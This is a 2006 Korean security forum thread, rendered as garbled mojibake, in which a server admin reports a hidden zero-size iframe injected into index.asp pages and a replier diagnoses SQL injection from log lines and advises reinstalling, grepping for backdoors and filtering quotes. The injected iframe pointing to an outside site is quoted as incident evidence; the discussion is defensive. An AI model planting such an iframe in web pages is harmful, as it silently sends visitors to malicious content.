Å©·¡Å· ÇÇÇØ

 423, 10/22 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   ¸Û¸Û
   http://hackerschool.org
   [re] À©µµ¿ì À¥¼­¹ö ÆÄÀÏ º¯°æ(ÇØÅ·)¿¡ °üÇÑ ¹®ÀÇÀÔ´Ï´Ù..

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_recover&no=240 [º¹»ç]



soarrr´Ô ¿À·£¸¸ÀÔ´Ï´Ù.

Windows + ASP °è¿­ÀÇ À¥¼­¹ö´Â ´ë´Ù¼ö°¡ SQL Injection Ãë¾àÁ¡¿¡ ÀÇÇÏ¿©
°ø°ÝÀ» ´çÇÕ´Ï´Ù.

SQL Injection °ø°ÝÀº "³ª '¿Í °°Àº Àο빮ÀÚ(quote)·Î ¼öÇàµÇ±â ¶§¹®¿¡
·Î±×¿¡¼­ ÀÌ °ªÀ» ±âÁØÀ¸·Î °Ë»ö/ºÐ¼®À» Çغ¸½Ã¸é µË´Ï´Ù.

¿Ã·Á ÁֽŠ·Î±×¸¦ º¸¸é,

GET /alumni/search/search/index.asp |25|80040e14|¿­_À̸§_'region'ÀÌ(°¡)_À߸øµÇ¾ú½À´Ï´Ù.
GET /gs/notice/view.asp seq=|25|80040e14|ÁÙ_1:_'='_±ÙóÀÇ_±¸¹®ÀÌ_À߸øµÇ¾ú½À´Ï´Ù.

¿Í °°ÀÌ SQL Injection °ø°Ý ÈçÀûÀÌ ³²¾ÆÀÖ´Â °ÍÀ» º¼ ¼ö ÀÖ½À´Ï´Ù.
À§Ã³·³ SQL error°¡ Ãâ·ÂµÇ´Â »óȲÀ̶ó¸é SQL Injection °ø°Ý¿¡ ÀÌ¹Ì Ãë¾àÇÑ
»óÅÂÀÓÀ» ¾Ë ¼ö ÀÖ½À´Ï´Ù.

Å©·¡Å· ÇÇÇØ ÈÄ¿£ ¼­¹ö¸¦ À缳ġÇÏ´Â °ÍÀÌ °¡Àå ÁÁÀ¸¸ç, WEB ¼Ò½º¿¡ ¹éµµ¾î°¡ Ãß°¡
µÇÁö´Â ¾Ê¾Ò´ÂÁö ƯÁ¤ ¹®ÀÚ¿­(CreateObject, .Run)°ú ÃÖ±Ù ³¯Â¥·Î °Ë»öÀ» Çغ¸½Ã±â
¹Ù¶ø´Ï´Ù.

±×¸®°í SQL Injection Ãë¾àÁ¡ÀÌ ÀÖ´Â ¼Ò½º´Â ASP Ä¿¹Â´ÏƼ »çÀÌÆ® µîÀ» Âü°íÇÏ¿©
"³ª '¿Í °°Àº Àο빮ÀÚ¸¦ ÇÊÅ͸µÇϵµ·Ï ÆÐÄ¡ÇÏ¼Å¾ß ÇÕ´Ï´Ù.



===============================================================================
>¾È³çÇϼ¼¿ä.. ¿À·¡°£¸¸ÀÔ´Ï´Ù..
>Àá½Ã È°µ¿ÇÏ´Ù ÀáÀûÇعö¸®´Ù ÀÌ·¸°Ô ¿°Ä¡¾øÀÌ µµ¿òÀ» ¾ò°íÀÚ µ¹¾Æ¿Ô½À´Ï´Ù..
>
>´Ù¸§ÀÌ ¾Æ´Ï¶ó.. windows ¼­¹ö 2´ë°¡ index.asp ÆÄÀÏÀÌ º¯°æµÇ¾ú½À´Ï´Ù..
>(<iframe src="http://kr.kr2cn.com/index.htm" width="0" height="0" frameborder="0"></iframe>) <- »ðÀÔ
>ÄÚµå Á¦ÀÏ ÇÏ´Ü¿¡ iframe À¸·Î Äڵ尡 »ðÀԵǾú´Âµ¥..
>º¯°æ³¯Â¥°¡ Á¦°¢±â 2005³â 12¿ù°ú 2006³â 6¿ù °æÀÔ´Ï´Ù..
>¹°·Ð »ç°í´Â ÃÖ±Ù¿¡ ¹ß»ýÇÑ°ÍÀ¸·Î ÃßÁ¤µË´Ï´Ù¸¸..(¾Æ´Ò¼öµµ ÀÖ½À´Ï´Ù..)
>
>¿ì¼± ÇÑ ¼­¹ö¸¦ º¸¸é ¾Ë¼ö¾ø´Â °èÁ¤(s-1-5-21-1454055633-2705038733-166218806..) À̶ó°í index.asp ÆÄÀÏ¿¡ º¸¾È Á¤º¸¿¡ °èÁ¤ÀÌ Ãß°¡µÇ¾îÀÖ½À´Ï´Ù..(win2003)
>´Ù¸¥ ¼­¹ö´Â 2000¿¡´Â ¾ø±¸¿ä..
>
>°¢ °¢ ÆÄÀÏÀÌ »ý¼ºµÅ¾úÀ» ¶§ ±âÁØÀ¸·Î ·Î±×¸¦ ÷ºÎÇÕ´Ï´Ù..
>¾î¶² Ãë¾àÁ¡À¸·Î °¡´ÉÇß´ÂÁö Á¶¾ðÁ» ºÎŹµå¸®°Ú½À´Ï´Ù..
>·Î±×´Â plaza.snu.ac.kr/~heeya/logs.zip  ´Ù¿î¹ÞÀ¸½Ã¸é µË´Ï´Ù..
>
>¸Û¸Û´Ô Àß Áö³»¼ÌÁÒ?? ^^ ¹®¾ÈÀÎ»ç µå¸³´Ï´Ù..
===============================================================================

  Hit : 6644     Date : 2006/09/27 03:33



    
243   Ŭ¶óÀ̾ðÆ® ºÐ¼®..[2]     sejin4951
08/10 4033
242   Áú¹®...[3]     È÷ÅÍƲ¾î
08/11 3709
241   À©µµ¿ì À¥¼­¹ö ÆÄÀÏ º¯°æ(ÇØÅ·)¿¡ °üÇÑ ¹®ÀÇÀÔ´Ï´Ù..     soarrr
09/05 4469
    [re] À©µµ¿ì À¥¼­¹ö ÆÄÀÏ º¯°æ(ÇØÅ·)¿¡ °üÇÑ ¹®ÀÇÀÔ´Ï´Ù..     ¸Û¸Û
09/27 6643
239   ·¹Áö½ºÆ®¸®¸¦ º¸¸é ÀÚ²Ù keyhookÀÌ ³ª¿Í¿ä[3]     MaySecond
09/11 3703
238   ¹öµð¸¦ ÇÏ°íÀִµ¥.... µð½º¶ó´Â°É °É´õ¶ó±¸¿ä..[1]     fkwltjd
09/22 4333
237   ¹èÄ¡ÆÄÀÏ..[2]     skspc2
09/23 3652
236   ¸®´ª½º ¹× ±âŸµîµî Áú¹® 2°³¸¸¿ä ..!![4]     ¿ÀŹ
09/23 3977
235   ¹æÈ­º® ±ò¾Æµµ ÇØÅ·ÀÌ °¡´ÉÇÑ°¡¿ä?[5]     sme417
09/29 4416
234     ÇØÄ¿¿¡ ´ëÇØ ¾Ë±¸ ½Í¾î¿è~~^^ Àú Ãʺ¸¶ó¼­...     lala11
10/20 3819
233   ¾È¾²´Â ³ëÆ®ºÏÀÌ Àִµ¥¿ä...¿©±â¼­ Àü¿¡ ¾²´ø ÇÁ·Î±×·¥ÀÇ ºñ¹øÀ» À¯ÃâÇÒ ¼öÀÖ³ª¿ä?[4]     yangsman
10/16 4144
232   netstat ¿¡ ´ëÇؼ­...[3]     ohlahm
10/23 4270
231   level1Àº ¹®Á¦´Â ¾È³ª¿À°í ¹¹Çϴ°ÇÁö ..[6]     nm108
10/30 3975
230 ºñ¹Ð±ÛÀÔ´Ï´Ù  ÀÚ½ÅÀÇ IPÁÖ¼Ò´Â ¾î¶»°Ô ¾Ë¾Æ³»¿ä?     ¾ÆÀ̺ñÆ®
11/04 1
229   Á¦ ¾ÆÀ̵ð[3]     dtg3581
11/05 3535
228   IIS Å©·¡Å· °ü·Ã Áú¹®ÀÔ´Ï´Ù..[1]     soarrr
11/09 3895
227   ¹ÙÀÌ·¯½º¸¦ ¸¸µé°í ½ÍÁö¸¸..[3]     ssonacy
11/16 3879
226   À¯ÇØ»çÀÌÆ® ÀÚ±â ÄÄ Á¢¼Ó ÅÚ³Ý ¹®Á¦[3]     nm108
11/18 3826
225   Àΰ£ µ¹°Ô Çϳ×..;;[5]     rlgnszzz
11/18 3955
224   °ÔÀÓÁ¢¼Ó ¾ÆÀ̵𸸠º¸°í ÇØÅ·ÀÌ°¡´ÉÇÑ°¡¿©??[4]     snlrlfkf
11/21 5355
[1][2][3][4][5][6][7][8][9] 10 ..[22]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org